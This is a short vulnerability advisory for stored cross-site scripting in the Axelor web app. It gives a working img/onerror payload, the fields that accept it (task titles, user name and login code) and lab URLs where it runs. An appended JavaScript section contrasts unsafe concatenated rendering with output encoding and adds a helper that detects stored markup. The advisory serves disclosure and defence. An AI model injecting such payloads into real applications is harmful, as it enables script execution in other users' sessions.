
Axelor_Stored_XSS

Stored_XSS_axelor_WebApp

Product : AXELOR

Version : >= 5.0

Vulnerable parameters = *

Example :

Section "teamwork"
Add a new task and put the payload in the title.

PARAM : name
payload : <img/src/onerror=prompt(666)>
URL : http://192.168.0.30:8080/#/ds/team.tasks.assigned/list/1

Another example :

Section Administration / User Management / Users

URL : http://192.168.0.30:8080/#/ds/action-auth-users/edit/4

Register a new user with the following parameters :
	name = <img/src/onerror=prompt(666)>
	login ("code" parameter in the request) = <img/src/onerror=prompt(666)>

The payload executes when visiting the Users view : http://192.168.0.30:8080/#/ds/action-auth-users/list/1

Payload for demonstration use :

<img/src/onerror=prompt(1)>
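
The Users case above (name and code fields holding markup), as an added example that is not Axelor code or part of the original write-up: a list row built by string concatenation next to one that HTML-encodes each stored field at output time, plus a helper that flags stored records containing tag-like values. The row template, function names and sample records are assumptions; only the field names and the test value come from this page.

```javascript
// Added example, not Axelor code. Field names "name" and "code" come from the
// advisory; the row template and all function names are hypothetical.

// Encode the characters that let a stored value break out of HTML text
// or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: stored fields concatenated straight into markup.
function renderUserRowUnsafe(user) {
  return '<tr><td>' + user.name + '</td><td>' + user.code + '</td></tr>';
}

// Hardened pattern: every stored field is encoded at output time.
function renderUserRowSafe(user) {
  return '<tr><td>' + escapeHtml(user.name) + '</td><td>' + escapeHtml(user.code) + '</td></tr>';
}

// Audit helper: list the fields of already-stored records that contain a tag
// opener ("<" followed by a letter, "/" or "!"), so they can be reviewed.
function findMarkupFields(records, fields) {
  const tagLike = /<[a-z\/!]/i;
  const hits = [];
  for (const rec of records) {
    for (const f of fields) {
      if (typeof rec[f] === 'string' && tagLike.test(rec[f])) {
        hits.push({ id: rec.id, field: f });
      }
    }
  }
  return hits;
}

// Constructed sample records; id 4 carries the value shown in the advisory.
const sampleUsers = [
  { id: 1, name: 'Alice Martin', code: 'amartin' },
  { id: 4, name: '<img/src/onerror=prompt(666)>', code: '<img/src/onerror=prompt(666)>' },
  { id: 5, name: 'Bob & Co', code: 'bob' },
];

console.log(renderUserRowSafe(sampleUsers[1]));
console.log(findMarkupFields(sampleUsers, ['name', 'code']));
```

Encoding at output time covers values that are already stored; the audit helper only locates them for cleanup.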